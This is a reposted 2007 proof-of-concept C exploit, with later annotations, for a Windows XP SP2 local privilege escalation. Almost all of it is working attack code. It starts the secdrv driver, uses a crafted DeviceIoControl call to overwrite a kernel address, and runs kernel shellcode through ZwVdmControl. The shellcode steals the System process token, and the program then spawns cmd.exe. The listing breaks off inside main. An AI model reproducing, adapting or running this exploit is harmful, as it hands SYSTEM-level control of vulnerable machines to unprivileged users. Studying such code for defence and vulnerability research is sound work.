Windows Local Privilege Escalation Vulnerability Exploit

    [晴 November 13, 2007 16:36 | by ]
Author:  Polymorphours
Email:   Polymorphours@whitecell.org
Homepage:http://www.whitecell.org
Date:    2007-10-23



#include
#include

#pragma comment (lib, "ntdll.lib")

// Native-API types declared locally because the listing does not pull in
// the ntdll headers (the two #include lines above lost their targets in
// extraction; presumably <windows.h> and <stdio.h> -- confirm).
typedef LONG NTSTATUS;

#define STATUS_SUCCESS  ((NTSTATUS)0x00000000L)
// Not referenced by the code visible in this listing.
#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)

// PE base-relocation entry: 12-bit page offset plus 4-bit relocation type
// packed into one WORD. Not referenced by the code visible in this listing.
typedef struct _IMAGE_FIXUP_ENTRY {

    WORD    offset:12;
    WORD    type:4;
} IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;

// Counted UTF-16 string as used by the native API (Length/MaximumLength are
// byte counts). Not referenced by the code visible in this listing.
typedef struct _UNICODE_STRING {

  USHORT Length;
  USHORT MaximumLength;
  PWSTR Buffer;
} UNICODE_STRING, *PUNICODE_STRING;

// Only the one information class this file defines; not referenced by the
// code visible in this listing.
typedef enum _SYSTEM_INFORMATION_CLASS {

  SystemModuleInformation=11,
} SYSTEM_INFORMATION_CLASS;



// Per-module record returned for information class 11 (loaded kernel
// modules). Not referenced by the code visible in this listing.
typedef struct _SYSTEM_MODULE_INFORMATION { // Information Class 11

  ULONG Reserved[2];
  PVOID Base;
  ULONG Size;
  ULONG Flags;
  USHORT Index;
  USHORT Unknown;
  USHORT LoadCount;
  USHORT ModuleNameOffset;
  CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;


// Global function pointer, filled in at run time by main() via
// GetProcAddress on ntdll.dll; it is NULL until then. IN/OUT are the
// Windows-header annotation macros and expand to nothing.
NTSTATUS
(NTAPI *NtAllocateVirtualMemory)(
  IN HANDLE ProcessHandle,
  IN OUT PVOID *BaseAddress,
  IN ULONG ZeroBits,
  IN OUT PULONG AllocationSize,
  IN ULONG AllocationType,
  IN ULONG Protect
  );


//
// Copies the inline-assembly stub below into the caller-supplied buffer.
//
// ShellCodeMemory - destination buffer; the caller (main) allocates it as
//                   RWX and pre-fills it with 0x90 before calling here.
//
// Behaviour by OS version (GetVersionEx result; its return value is not
// checked):
//   - major != 5           : prints a message and terminates the process with
//                            ExitProcess(0). Exit code 0 does not signal the
//                            failure to a parent process.
//   - major == 5, minor == 1 (XP): copies the stub.
//   - major == 5, any other minor: returns without writing anything, so the
//                            buffer keeps its 0x90 fill and the caller
//                            proceeds as if a stub were present -- a latent
//                            defect, since nothing reports the unsupported
//                            version.
//
// The stub's absolute address (0xFFDFF124) and every structure offset are
// hard-coded; per the banner in main they were tested only on XP SP2, so the
// stub is tied to that one build.
//
VOID
SetShellCodeToMemory(
  PVOID  ShellCodeMemory
  )
{
  OSVERSIONINFOEX  OsVersionInfo;

  RtlZeroMemory( &OsVersionInfo, sizeof(OsVersionInfo) );
  OsVersionInfo.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
  GetVersionEx ((OSVERSIONINFO *) &OsVersionInfo);

  if ( OsVersionInfo.dwMajorVersion != 5 ) {

    printf( "Not NT5 system\n" );
    ExitProcess( 0 );
    return;
  }

  if ( OsVersionInfo.dwMinorVersion == 1 ) {
  
    __asm {

      // The call pushes the address of the first nop; CopyXpShellCode pops
      // it into esi, so everything between here and that label is the
      // payload to be copied. The stub itself is never executed in this
      // function's context.
      call CopyXpShellCode

      // Padding at the head of the copied stub (purpose not stated).
      nop
      nop
      nop
      nop
      nop
      nop

      mov  eax,0xFFDFF124  // eax = KPCR    (not 3G Mode)
      mov eax,[eax]

      // Per the original comments, esi ends up pointing at the current
      // process object (the token write below targets it) -- the 0x220
      // offset is not explained on the page; verify against XP SP2 layouts.
      mov  esi,[eax+0x220]
      mov  eax,esi

    searchXp:

      // Walk the linked list of process objects (link field at +0x88)
      // until the entry whose ID field (+0x84) equals 4.
      mov  eax,[eax+0x88]
      sub  eax,0x88
      mov  edx,[eax+0x84]
      cmp  edx,0x4  // Find System Process
      jne  searchXp

      mov  eax,[eax+0xc8]  // fetch the System process's token
      mov  [esi+0xc8],eax  // overwrite the current process's token with it

      // Pops two DWORD arguments on return; this matches the two pushes
      // that precede the ZwVdmControl call in main.
      ret 8
        
  CopyXpShellCode:
      pop esi                     // esi = start of the stub (address after the call)
      mov edi, ShellCodeMemory    // edi = destination buffer
      lea ecx, CopyXpShellCode
      sub ecx, esi                // ecx = stub length in bytes
      cld
      rep movsb                   // copy stub into ShellCodeMemory
    }
  
  }

}

int main(int argc, char* argv[])
{
  NTSTATUS  status;
  PVOID  ZwVdmControl = NULL;
  DWORD  HookAddress = 0x804E3AD8;  // test by xp sp2
  PVOID  ShellCodeMemory = (PVOID)0x200;
  DWORD  MemorySize = 0x1000;

  HANDLE  deviceHandle;
  DWORD  dwReturnSize = 0;

  SC_HANDLE  hscmHandle = NULL;
  SC_HANDLE  hscDriver = NULL;

  PROCESS_INFORMATION      pi;
  STARTUPINFOA        stStartup;
  PVOID    InputBuffer = NULL;

  printf( "\tWindows Local Privilege Escalation Vulnerability Exploit 0day (POC)\n" );
  printf( "Create by Whitecell's Polymorphours@whitecell.org 2007/04/15\n" );
  printf( "TEST OS: WINDOWS XP SP2\n" );

  printf( "[*] Connect SCM ... " );

  hscmHandle = OpenSCManager ( NULL, NULL, GENERIC_READ | SERVICE_START );
  if ( NULL == hscmHandle ) {
  
    printf( "failed, code: %d\n", GetLastError() );
    return 0;
  }

  printf( "success!!\n" );
  printf( "[*] Open services ... " );

  hscDriver = OpenService( hscmHandle, "secdrv", GENERIC_READ | SERVICE_START );
  if ( NULL == hscDriver ) {
  
    printf( "failed, code: %d\n", GetLastError() );
    CloseServiceHandle ( hscmHandle );
    return 0;
  }

  printf( "success!!\n" );
  printf( "[*] Start services ... " );

  //
  // 启动secdrv驱动
  //

  if ( !StartService( hscDriver, 0, NULL ) ) {
  
    if ( ERROR_SERVICE_ALREADY_RUNNING != GetLastError() ) {

      printf( "failed, code: %d\n", GetLastError() );
      CloseServiceHandle ( hscDriver );
      CloseServiceHandle ( hscmHandle );
      return 0;
    }
  }

  printf( "success!!\n" );

  CloseServiceHandle ( hscDriver );
  CloseServiceHandle ( hscmHandle );

  NtAllocateVirtualMemory = (long (__stdcall *)(void *,void ** ,unsigned long,unsigned long *,unsigned long,unsigned

long))GetProcAddress( LoadLibrary("ntdll.dll"), "NtAllocateVirtualMemory" );
  if ( NtAllocateVirtualMemory == NULL ) {
  
    printf( "GetProcAddress failed, code: %d\n" );
    return 0;
  }

  ZwVdmControl = GetProcAddress( LoadLibrary("ntdll.dll"), "ZwVdmControl" );

  printf( "[*] Create execute environment ... " );

  status = NtAllocateVirtualMemory( (HANDLE)-1,
                    &ShellCodeMemory,
                    0,
                    &MemorySize,
                    MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN,
                    PAGE_EXECUTE_READWRITE );
  if ( status != STATUS_SUCCESS ) {
  
    printf( "failed!\n[-] NtAllocateVirtualMemory failed, status: %08X\n", status );
    return 0;
  }

  printf( "Ok!\n" );

  //
  // 初始化 ShellCode
  //

  memset( ShellCodeMemory, 0x90, MemorySize );
  SetShellCodeToMemory( (PVOID)((DWORD)ShellCodeMemory + 0x200) );

  deviceHandle = CreateFile("\\\\.\\secdrv",
            0,
            FILE_SHARE_READ|FILE_SHARE_WRITE,
            NULL,
            OPEN_EXISTING,
            0,
            NULL);
  if ( INVALID_HANDLE_VALUE == deviceHandle ) {
  
    printf( "[-] Open device failed, code: %d\n", GetLastError() );
    return 0;
  } else {
  
    printf( "[*] Open device success\n" );
  }

  InputBuffer = LocalAlloc( LPTR, 0x1000 );

  *(PDWORD)InputBuffer = 0x1;
  *(PDWORD)((DWORD)InputBuffer + 0x4) = 0x96;

  DeviceIoControl( deviceHandle,
           0xca002813,
           InputBuffer,
           4,
           (PVOID)HookAddress,
           4,
           &dwReturnSize,  
           NULL );

  CloseHandle( deviceHandle );

  printf( "[*] call shellcode ... " );

  _asm {
  
    xor ecx,ecx
    push ecx
    push ecx
    mov eax, ZwVdmControl
    call eax
  }

  printf( "Done.\n" );
  printf( "[*] Create New Process\n" );

  GetStartupInfo( &stStartup );

  CreateProcess( NULL,
          "cmd.exe",
          NULL,
          NULL,
          TRUE,
          NULL,
          NULL,
          NULL,
          &stStartup,
          &pi );

